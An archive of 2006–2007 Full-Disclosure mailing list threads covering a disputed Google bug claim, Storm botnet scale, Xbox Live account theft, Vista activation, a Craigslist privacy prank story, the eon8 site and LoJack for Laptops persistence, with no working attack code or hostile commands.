Discuss mailing list [EMAIL PROTECTED] http://lists.isoc-ny.org/mailman/listinfo/discuss ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fake claim by Vaibhav Pandey regarding Googleacknowledging a vulnerability
I'm not saying that Pandey found or didnt find an orkut issue. However, Google Online Pvt Ltd is a subsidary of Google Inc. Also if you do a little searching around you can find 'a' Tanushree Baruah that supposedly is part of the orkut Operations Team. I dont know what your motivation for going on a rant about how unskilled others are, but hopefully it makes you feel good. A better contribution to the list might be finding your own bug or vulnerability and publishing it to FD vs. hiding behind an anonymous email spouting off about nothing of value. Jay - Original Message - From: Fake Reports [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Fri, 7 Sep 2007 10:39:20 -0700 (PDT) Subject: [Full-disclosure] Fake claim by Vaibhav Pandey regarding Googleacknowledging a vulnerability India is full of Ankit Fadia's and Aditya K. Sood's. While I do not intend to ridicule Indian security researchers because some of them are truly good and have made good disclosures but people like Ankit Fadia and Aditya are a disgrace to India and the full-disclosure community. And a new such budding lame-ass is Vaibhav Pandey. Vaibhav Pandey has made a false claim of Google acknowledging a vulnerability:- http://technofriends.wordpress.com/2007/09/06/google-acknowledges-orkut-bug/ Notice the signature of the so-called acknowledgement from Google:- [QUOTE] Tanushree Baruah Spam/Product teams, orkut Google Online Pvt Ltd India [/QUOTE] Where on earth is this company called Google Online Pvt Ltd? Isn't the company called Google Inc.? And WTF is Spam/Product teams? This guy hasn't even bothered to check the Google's security page or he would have known that it is the Google security team that responds to security incidents. Ready for the edge of your seat? Check out tonight's top picks on Yahoo! TV. http://tv.yahoo.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] World's most powerful supercomputer goes online (fwd)
-- Forwarded message -- Date: Fri, 31 Aug 2007 18:23:57 +1200 From: Peter Gutmann [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: World's most powerful supercomputer goes online This doesn't seem to have received much attention, but the world's most powerful supercomputer entered operation recently. Comprising between 1 and 10 million CPUs (depending on whose estimates you believe), the Storm botnet easily outperforms the currently top-ranked system, BlueGene/L, with a mere 128K CPU cores. Using the figures from Valve's online survey, http://www.steampowered.com/status/survey.html, for which the typical machine has a 2.3 - 3.3 GHz single core CPU with about 1GB of RAM, the Storm cluster has the equivalent of 1-10M (approximately) 2.8 GHz P4s with 1-10 petabytes of RAM (BlueGene/L has a paltry 32 terabytes). In fact this composite system has better hardware resources than what's listed at http://www.top500.org for the entire world's top 10 supercomputers: BlueGene/L: 128K CPUs, 32TB Jaguar: 22K CPUs, 46TB Red Storm: 26K CPUs, 40TB BGW: 40K CPUs, 10TB New York Blue: 37K CPUs, 18TB ASC Purple: 12K CPUs, 49TB eServer Blue Gene: ? Abe: 10K CPUs, 10TB MareNostrum: 10K CPUs, 20GB HLRB-II: 10K CPUs, 39GB This may be the first time that a top 10 supercomputer has been controlled not by a government or megacorporation but by criminals. The question remains, now that they have the world's most powerful supercomputer system at their disposal, what are they going to do with it? And I wonder what the LINPACK rating for Storm is? Peter. - The Cryptography Mailing List Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security Contact for FOX Sports
May try: Fox Sports Interactive Media, LLC. Business Legal Affairs 407 N. Maple Drive Beverly Hills, California 90210 Telephone: (310) 969-7192 e-mail: [EMAIL PROTECTED] Jay - Original Message - From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Tue, 21 Aug 2007 18:22:27 -0400 Subject: [Full-disclosure] Security Contact for FOX Sports Does anyone have a security contact for FOX sports? -- Click for free information on accounting careers, $150/hour potential. http://tagline.hushmail.com/fc/Ioyw6h4dCeQnmNQQ42y45NE9mVwnL3mYaWR0APZbmb61bKKPUSSzmI/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Xbox live accounts are being stolen (is thetraining working?)
This list is about Full Disclosure, exploits vulnerabilities etc. Noone gives a rat arse whether some whiny n00bz cant play Halo. Find another list to gripe about customer service issues. Futhermore there isnt any proof provided that ppl didnt get compromised by getting phished themselves. I'm sure the same mindless twitz that are whinning here have to have a myspace account spilling all their personal information anyway. Jay - Original Message - From: Kevin Finisterre (lists) [mailto:[EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk,[EMAIL PROTECTED] Sent: Thu, 9 Aug 2007 11:44:50 -0400 Subject: Re: [Full-disclosure] Xbox live accounts are being stolen (is thetraining working?) Which is fine... I was more than anything pointing out that this individual still chose to ignore company policy. And being stereotypical it sounded like the *same* call center I called into before, so if she is doing it I am sure others are as well. Hopefully she had minimal access to personal data. And I guess I was also highlighting the fact that no one was really paraded around for us to tar and feather for stealing accounts. Did you guys actually catch someone or did they get off Scott free? This issue had honestly been out of my mind for some time, I was quite surprised to hear of it happening again. -KF On Aug 9, 2007, at 11:26 AM, Scott Hirnle wrote: Hi Kevin, For Hardware calls, we don't verify the same information as we do on Live calls. The reason for this is because some people (in fact many people) who call into the hardware queue are not even Xbox Live customers. Therefore, they don't have the same data to verify against and as a result, our agents don't have visibility into it and our entitlement process is different for each line of business. Scott -Original Message- From: Kevin Finisterre (lists) [mailto:[EMAIL PROTECTED] Sent: Thursday, August 09, 2007 8:21 AM To: full-disclosure@lists.grok.org.uk Cc: Ashley Wilson Subject: Re: [Full-disclosure] Xbox live accounts are being stolen (is the training working?) I find it kind of ironic that my Xbox broke last night after an update and I am now on the phone with a Xbox live representative. After the whole stolen accounts fiasco I remember calling in an having techs flat out refuse to work with you until you verified your full name, address, phone number, gamer tag, xbox console serial number and email address used on the account. I just finished talking to a tech about my xbox after only giving her my First name, Address and Phone number (I couldn't give my serial because my xbox is not near me). After asking to speak with her supervisor about some other issues I asked him to remind me of what information should be verified prior to speaking with someone. He told me that First and Last name, Address, Phone Number, Email and Serial Number had to be verified and if any one item was missing or not available to be verified via other means then they have been instructed to not speak with you. I asked him what happened with Gamertag verification and he stated that only applied to Xbox live issues and it was not verified for Xbox console issue. I didn't bother telling him the tech that passed me on to him didn't quite verify all the data, I simply said thanks and hung up. At the very least this may help illustrate that no amount of training can fully curb human behavior. The tech I talked to had no problem ignoring the lack of serial number and email address on my account. So Ashley... yeah I guess it is entirely possible that accounts *can* still be stolen. Hell for all I know it could be the same kids since no one was ever produced as the culprit of the previous caper. Good luck! -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tcpdfilter
Try the wayback machine. http://web.archive.org/web/*/http://freshmeat.net/ Jay - Original Message - From: scott [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Wed, 13 Jun 2007 23:32:31 -0400 Subject: [Full-disclosure] Tcpdfilter -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Anyone know where I can get a copy of tcpdfilter?The site on Freshmeat is gone and Googling doesn't come up with anything Or is there a replacement for it? Any help will be much appreciated, Regards, Scott -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGcLbPelSgjADJQKsRAtsKAJsHx11/9Tz8x0dRXJhwtO4bCf+jgQCgtjeD dJNRHmYb8raBWXtknNGdAWU= =3CIE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Safari for Windows, 0day URL protocol handler command injection
Interesting thing to think about ... Does it benefit Apple to have an insecure browser on Windows? If the millions of clueless computer users get owned will they be able to understand that it was Safari's fault or just that their windows box got compromised and now they have grief and financial loss. Jay - Original Message - From: dump [mailto:[EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk,[EMAIL PROTECTED] Sent: Tue, 12 Jun 2007 18:31:38 +0200 Subject: Re: [Full-disclosure] Safari for Windows,0day URL protocol handler command injection Steven Adair wrote: Looks like a few others have been found: http://erratasec.blogspot.com/2007/06/nce.html Steven securityzone.org Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecting to see quite a number of vulnerabilities targeted towards this new Windows browser. There is a URL protocol handler command injection vulnerability in Safari for Windows that allows you to execute shell commands with arbitrary arguments. This vulnerability can be triggered without user interaction simply by visiting a webpage. The full advisory and a working Proof of Concept exploit can be found at Page is dead but sound like old stuff reported years ago: http://www.securityfocus.com/bid/10406 just that they fixed it at the helper level not at safari level (well it was the right thing to do!). but then they prolly forgot about it and released safari for windows. ^ ^ this said its kinda nothing special to be able to read old advisory to find this kind of bugs :) (and its the right thing to do, too!) 2hours is even long :D ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
On Wed, 6 Jun 2007, J. Oquendo [EMAIL PROTECTED] wrote: H D Moore wrote: Hello, Some friends and I were putting together a contact list for the folks attending the Defcon conference this year in Las Vegas. My friend sent out an email, with a large CC list, asking people to respond if they planned on attending. The email was addressed to quite a few people, with one of them being David Maynor. Unfortunately, his old SecureWorks address was used, not his current address with ErrattaSec. Since one of the messages sent to the group contained a URL to our phone numbers and names, I got paranoid and decided to determine whether SecureWorks was still reading email addressed to David Maynor. I sent an email to David's old SecureWorks address, with a subject line promising 0-day, and a link to a non-public URL on the metasploit.com web server (via SSL). Twelve hours later, someone from a Comcast cable modem in Atlanta tried to access the link, and this someone was (confirmed) not David. SecureWorks is based in Atlanta. All times are CDT. I sent the following message last night at 7:02pm. --- From: H D Moore hdm[at]metasploit.com To: David Maynor dmaynor[at]secureworks.com Subject: Zero-day I promised Date: Tue, 5 Jun 2007 19:02:11 -0500 User-Agent: KMail/1.9.3 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: 200706051902.11544.hdm[at]metasploit.com Status: RO X-Status: RSC https://metasploit.com/maynor.tar.gz --- Approximately 12 hours later, the following request shows up in my Apache log file. It looks like someone at SecureWorks is reading email addressed to David and tried to access the link I sent: 71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 This address resolves to: c-71-59-27-152.hsd1.ga.comcast.net The whois information is just the standard Comcast block boilerplate. --- Is this illegal? I could see reading email addressed to him being within the bounds of the law, but it seems like trying to download the 0day link crosses the line. Illegal or not, this is still pretty damned shady. Bastards. -HD ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Why would it be illegal if his former employer accessed his email using this method. The information going to their network is considered their property and they could do as they see fit. I could see if in your email you included the almost always ignored disclaimer bs though: THIS EMAIL IS INTENDED FOR THE RECIPIENT'S EYES ONLY. YOU WILL LIKELY IGNORE THIS ANYWAY BUT USING THIS STUPIDLY CRAFTED CONFIDENTIALITY DISCLAIMER, I WILL FILL MORE SPACE IN YOUR INBOX AND GENERATE MORE POINTLESS BANDWIDTH USAGE ON YOUR NETWORK. IF YOU ARE NOT THE INTENDED RECIPIENT READING THIS EMAIL AND OR ATTACHMENTS LINKS ETAL WILL RESULT IN US PRETENDING TO HIRE A LAWYER AND DOING SOMETHING ABOUT IT. I know how many times I've seen these listed with someone shooting off information to mailing lists to do an oops f*** I sent that to the wrong place... What are the options now? Sue everyone who read it? Gash their eyes out. Normally if I were going to send out an email that was *THAT* confidential, I personally do two things: 1) Call the person to make sure they're available to get it. If not its not sent until they're ready. 2) Secondly if I have to post something on my website for someone's personal viewing, I usually do something like: $ echo theirname|md5 6a9c1e04624bcc81a84800b8aa10a1f1 Where the checksum becomes the file and I send them the link to the file. What are the odds of someone finding that checksum... Highly unlikely. -- J. Oquendo Ah, something like. Likely in practice your file name is saltier, and you can taste the nonce. oo--JS. http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Macro threats
On Tue, 5 Jun 2007, Muscarella, Sebastian \(IT\) [EMAIL PROTECTED] wrote: Wanted to ask this forum's opinion on the state of macro threats. While we have not seen too many this past year which were actively exploited, we wanted to know if there are any indications on whether this threat would increase, decrease, become more sophisticated in the next year or two. Any information would be very helpful. We're currently looking at enhancing some security features in-house around Microsoft Office, and want as much intelligence on the topic as possible. Thanks, Sebastian Muscarella Do not use any Microsoft Windows OS nor any Microsoft application which can be run on these OSes. oo--JS. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs player (fwd)
-- Forwarded message -- Date: Wed, 23 May 2007 15:32:47 -0500 From: Aaron Hackney [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [tech-geeks] OT: Local computer shop is getting sued by NBA Spurs player As many of you may or not know, the Spurs are a big deal here in San Antonio. (GO SPURS GO!) Anyhow, one of the stars of the Spurs is suing a local computer shop for $2 mil. http://www.thesmokinggun.com/archive/years/2007/0501071bowen1.html From what I understand. They used an off the shelf hard drive to ghost his PC, install a new drive and then ghost the image back to the pc. They then accidentally sold that hard disk in a pc to some lady. She notices there is stuff already on the disk. Opens up my documents and there is a TON of personal info on this millionaire nba star From what I understand, it's bad charma coming back to haunt this company. everyone on a different list-serv that I am on has nothing but bad things to say about them, including former employees :P - To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [linux-elitists] Gutsy Gibbon to include strictly-free branch (fwd)
-- Forwarded message -- Date: Mon, 16 Apr 2007 19:04:06 -0700 From: Dave Crossland [EMAIL PROTECTED] To: Greg KH [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [linux-elitists] Gutsy Gibbon to include strictly-free branch On 16/04/07, Greg KH [EMAIL PROTECTED] wrote: takes an ultra-orthodox view of licensing: no firmware, drivers, imagery, sounds, applications, or other content which do not include full source materials and come with full rights of modification, remixing and redistribution. There should be no more conservative home, for those who demand a super-strict interpretation of the 'free' in free software. This work will be done in collaboration with the folks behind Gnewsense. Hm, to do this properly it should only boot if you have linuxbios installed, but what's the odds that people will realize that... That depends how nasty proprietary BIOS behave... Intel EFI is a DRM bios, since it has unlimited control of your memory and I/O, and implements a full network stack. So the BIOS can veto your I/O, and report your being veto'd over the network. By design. I know people at banks who are very unhappy with this. They thought they were running GNU/Linux and knew what the whole thing was doing. A few years ago Intel were explaining the cool EFI stuff, how EFI can download a new version of the BIOS and burn it to flash, on its own. They explained how convenient this is - but chaos went off when the banks heard about this. For the banks, like LANL, when we buy a consumer machine, we either demand full, buildable, source code to their BIOS, or that they ship LinuxBIOS, now. - http://understandinglimited.com/2007/04/15/fosdem-2007-notes/ If you care about freedom, you'll be aware of this problem, and your next motherboard will be something listed on http://linuxbios.org/Supported_Motherboards - the Gigabyte M57SLI-S4 is the current favourite, and FSF sysad Ward Cunningham has written http://linuxbios.org/M57SLI-S4_Build_Tutorial -- Regards, Dave ___ linux-elitists mailing list [EMAIL PROTECTED] http://allium.zgp.org/cgi-bin/mailman/listinfo/linux-elitists ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vista Reduced Function mode triggered
On Mon, 1 Jan 2007, Poof [EMAIL PROTECTED] wrote: The issues that the original poster is having don't sound anything like normal behavior. One of the scenarios expected in Vista would be a Laptop that's been activated being used in a restricted internet work zone. And if that laptop has been activated normally (The 1-time activation as provided with the Windows install.) it shouldn't go to reduced mode. Further, it'll give a 30 day warning prior to going to reduced mode if it's suddenly deactivated asking for it to be reactivated. (Say a hardware change/etc.) In the short, I am unable to repro this. I'm currently running Vista on two systems; the other system is in a sandbox. (However, was open during the activation process.) Erm, from what I can see from the requirements, Internet is not required as it's in the same format as Audio. The issue is not: How Microsoft treats those whose boxes Microsoft has Tojaned. The issue is: Microsoft should not be root on my computer. And no EULA can take away root from me and grant root to Microsoft on any computer I own. oo--JS. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Geo. Sent: Monday, January 01, 2007 3:35 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vista Reduced Function mode triggered anything in vista's agreement in legalish that could be translated into 'you agree that you feed your software internet' ? http://www.microsoft.com/windowsvista/getready/systemrequirements.mspx Yep, specifies internet under requirements. Should specify unrestricted internet access if you ask me. Geo. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Discuss-gnuradio] VT receives NSF grant for SDR security (fwd)
-- Forwarded message -- Date: Tue, 19 Dec 2006 10:24:44 -0500 From: David P. Reed [EMAIL PROTECTED] To: discuss-gnuradio@gnu.org Subject: Re: [Discuss-gnuradio] VT receives NSF grant for SDR security Greg - I think the concept of software defined radio being explored by the VT folks is a concept I persoally refer to as crippled software radio. It is based on a discredited theory of security that was called a secure kernel when I was a student 30 years ago. In other words - that there is a small, well-defined portion of a system that can be certified separately from the rest of the system, which has the essential property that its *correct* operation *guarantees* that the entire system will be secure according to *all possible interpretations* of the word secure. I worked on a project of this sort, and am currently ashamed that I helped perpetuate that charade. I can only say that many others helped - it funded lots of work on proving programs correct - on the theory that it was feasible to prove small programs correct, and thus whole systems secure. The big lie, of course, is that the researchers essentially redefined the word secure to mean the trivial notion of security that you couldn't compromise the kernel. Of course today we stare the fraudulence of that idea in the face: phishing, XSS, and other very dangerous attacks do not depend one whit on a failure to secure a kernel of the operating system, or even the kernel of a router. Yet the idea that incorrectness is the same thing as insecurity persists in such ideas as the idea that you need hardware inegrity to prevent attacks on radio systems. I suggest that it is impossible to carry on a dialog with folks like the VT researchers, because they must necessarily buy into the certification of correctness notion of security.If they were concerned with correctness that would be fine - we could carry out a meaningful discussion about the difficulty of determining correctness in a system that is inherently focusing on getting reliable communications through unreliable channels (information theory). But since they play to the gods of deterministic correctness - unreliability doesn't fit in their notion of security - they cannot even consider the idea that there is no kernel that can be certified to reduce risk. ___ Discuss-gnuradio mailing list Discuss-gnuradio@gnu.org http://lists.gnu.org/mailman/listinfo/discuss-gnuradio ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Truths in Truth in Caller ID Act
On Mon, 2 Oct 2006, Nancy Kramer wrote: You are 100 percent right about the US government. The US Constitution may protect US citizens from the government but nothing will protect them from the big telecom companies who will own them and their data unless we enact a new neutrality law in the US. Regards, Nancy Kramer Yes. And we know the exact phrasing of the law: require common carriage on fast telecommunications, just as we require it on slow telecommunications. The issue is wiretapping, and interference with private and public communications. oo--JS. Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web At 04:48 PM 10/1/2006, Joe Barr wrote: On Sun, 2006-10-01 at 12:28 -0500, J. Oquendo wrote: So the United States government wants to pass the Truth in Caller ID act. Humorously it will do little do deter criminals from spoofing their caller ID and scamming innocent victims. Here is the rule/law followed by why it will fail: The U.S. government will do its duty, that is to say, they will lick the ass of the telecommunications industry lobbyists and do whatever they damn well say. -- It's a strange world when proprietary software is not worth stealing, but free software is. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Free Edition. Version: 7.1.407 / Virus Database: 268.12.10/459 - Release Date: 9/29/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.407 / Virus Database: 268.12.12/461 - Release Date: 10/2/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Privacy] Sexbaiting Social Experiment on Craigslist Affects Hundreds (fwd)
-- Forwarded message -- Date: Fri, 08 Sep 2006 09:00:51 -0700 From: Anthony Baker [EMAIL PROTECTED] To: No List [EMAIL PROTECTED] Subject: [Privacy] Sexbaiting Social Experiment on Craigslist Affects Hundreds Hey MB, Was just trolling through some of my RSS feeds and came across this post from www.waxy.org on something that I think might be of interest to many of you. It's a great read -- involves Craigslist, LiveJournal, online privacy, stupidity, and bloggers. What more could you want for your Friday morning? Have to say, the point towards the bottom about how expectations of privacy haven't been challenged yet are s true. Most people have an assumption of privacy, but just aren't aware of how true or false those assumptions are. Enjoy! - Recently, a blogger named Simon Owens ran a social experiment on Craigslist. He wandered into the Casual Encounters section of the personal ads where countless men and women were soliticing for no-strings-attached sex and wondered, Is it really that easy? As a test, he composed several ads with different permutations of assumed identity and sexual orientation: straight/bi men/women looking for the opposite/same sex. He then posted it to New York, Chicago, and Houston, and tallied the results. Overwhelmingly and instantly, the ads from the fake women looking for male partners were inundated with responses, sometimes several per minute. All the other ads received lukewarm responses, at best. These results weren't surprising, but some of the observations were... Many of these men used their real names and included personally identifiable information, including work email addresses and home phone numbers. Several admitted they were married and cheating on their spouses. Many included photos, often nude. His first conclusion was very reasonable: If a really malicious person wanted to get on craigslist and ruin a lot of people's lives, he easily could. Jason Fortuny's Craigslist Experiment On Monday, a Seattle web developer named Jason Fortuny started his own Craigslist experiment. The goal: Posing as a submissive woman looking for an aggressive dom, how many responses can we get in 24 hours? He took the text and photo from a sexually explicit ad (warning: not safe for work) in another area, reposted it to Craigslist Seattle, and waited for the responses to roll in. Like Simon's experiment, the response was immediate. He wrote, 178 responses, with 145 photos of men in various states of undress. Responses include full e-mail addresses (both personal and business addresses), names, and in some cases IM screen names and telephone numbers. In a staggering move, he then published every single response, unedited and uncensored, with all photos and personal information to Encyclopedia Dramatica (kinda like Wikipedia for web fads and Internet drama). Read the responses (warning: sexually explicit material). Instantly, commenters on the LiveJournal thread started identifying the men. Dissenters emailed the guys to let them know they were scammed. Several of them were married, which has led to what will likely be the first of many separations. One couple in an open marriage begged that their information be removed, as their religious family and friends weren't aware of their lifestyle. Another spotted a fellow Microsoft employee, based on their e-mail address. And it's really just the beginning, since the major search engines haven't indexed these pages yet. After that, who knows? Divorces, firings, lawsuits, and the assorted hell that come from having your personal sex life listed as the first search result for your name. Possibly the strangest thing about this sex baiting prank is that the man behind it is unabashedly open about his own identity. A graphic artist in Kirkland, Washington, Jason has repeatedly posted his contact information, including home phone, address, and photos. He's already received one threat of physical violence. Is he oblivious to the danger, or does he just not care? Since his stated interest is pushing people's buttons, I'm guessing the latter. Legality and Privacy But was any law actually broken? Fortuny obviously misrepresented himself under false pretenses, which is itself possibly actionable, but the privacy implications beyond that are very interesting. Does emailing someone your personal information act as an implicit waiver of your right to privacy? I'm not a lawyer, but as far as I can tell, no. If taken to court, he's at risk of two primary civil claims. Intentional infliction of emotional distress, while notoriously hard to prove in court, is certainly easier here based on his own writings. The second, more relevant claim, is public disclosure of private facts. This Findlaw article on the Washingtonienne scandal sums it up nicely: The disclosure must be public. The facts must be private. The plaintiff must
[Full-disclosure] Weird... www.eon8.com
Does anyone know about this site, or the projects related to it? www.eon8.com ? -- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hah, Interesting.....
{eon8} Complete As of July 1st, 2006, the E8 Project has completed. The purpose of this project was to determine the reactions of the internet public to lack of information. History The domain eon8.com was chosen, as it is short, easily remembered, and eon9 was already registered. It was originally posted on www.msfn.org, but was promptly removed as 'spam'. It was enough time for it to be copied to other forums throughout December 2005. Results We were amazed to discover that the site was instantly linked with terrorism, simply for the fact that it seems mysterious. Evil was the number one first impression people had of the site, in spite of the fact that there are no threats on the site. The only thing Eon 8 says is We don't want you here. Nothing else. Other less disappointing opinions were social experimentation (which was correct), James Bond movie viral marketing, and promotions for video games. For many people, being faced with a countdown timer was an instant reason to try to shut down or hack the site. This is a worrying reaction, that if someone doesn't understand something they must destroy it. As a result, the servers have been hit quite hard these last few days, but luckily 99% of the 'hackers' could easily be described as 'l4me n00bs'. Another worrying example of paranoia was how quickly people would jump to conclusions, such as telephoning the registered owner of a dog seen in a photograph on a server that hosts a page that links to eon8. Surprises The folks at Unfiction.com were the most resourceful and inventive, they successfully managed to decrypt several of the 'codes' on the site, forcing them to be re-encrypted using more secure methods. FAQ What about eon5.com? Nothing to do with us. Pure coincidence, but worked in our favor. What about the 8th eon being the end of the world? We picked Eon 8 because Eon 9 was already taken. We didn't know about the significance of this. Eon is a cool sounding word! Why July 1st? We didn't know how long it would take to get the word out using our subtle promotion methods. We allowed over 6 months. What do the codes on the site mean? They're mostly randomly generated integers encrypted with md5, but with certain letters removed and replaced. The Logs page is simply based on the current timestamp, encrypted and modified. You can't decrypt them, they really are random numbers. What is the Deployment Map? They're dots placed over major cities and several random locations, it was done mostly from memory. The random gif filename is an added touch to force a slight delay on loading, which looks more impressive in Internet Explorer, but not as much in Firefox. What's the password? There isn't one. If you did somehow manage to get in, you'd see an empty folder with a single text file that says This is a decoy folder. Please connect to the internal secure network. Can I see your website statistics? Yes, click here. Are you anything to do with Scientology? Did you see anything talking about a Free Personality Test or Xenu? Use your brain. Who are you, really? The most I can tell you is I am a 23 year old web designer from Florida named Mike. I can't narrow it down anymore than that. When I say 'we', I really mean 'me'. Conclusions People take things too seriously and panic over the most trivial things. But at the same time there are many people out there who think things through without jumping to conclusions. You can't let pointless speculation rule your lives and force you to live in fear. In Closing Thanks to everyone who kept things interesting, especially to the folks at unfiction. Sorry there is no ARG for you to play, but at least you had fun while it lasted. Click here for one Final Message from Eon 8 BE HAPPY THE END Sincerely, x21b Happy birthday, mtcaptain. From 'ls224' (aka x21b). Yes that really was me in the #eon-8 channel -- Jay Buhrt Achievement Focused Technology, Inc. [EMAIL PROTECTED] 574-538-8944 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Breaking LoJack for Laptops
FYI- I know this may be a little after-the-fact but I just came upon your article posted on 12-24-05 about how to disable LoJack for Laptops. I currently use this product and have tested it in depth for a while. The Notebook I use has Computrace built in to the BIOS. I have tried to disable rpcnet, ctmweb, rpcnetp, and other files associated with Lojack as well as blocking these files with my firewall and even blocking Computrace's IP. Needless to say my notebook still manages to call out. If you are still interested in this program you may want to look at machines with Computrace enabled BIOS first. -Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Breaking LoJack for Laptops
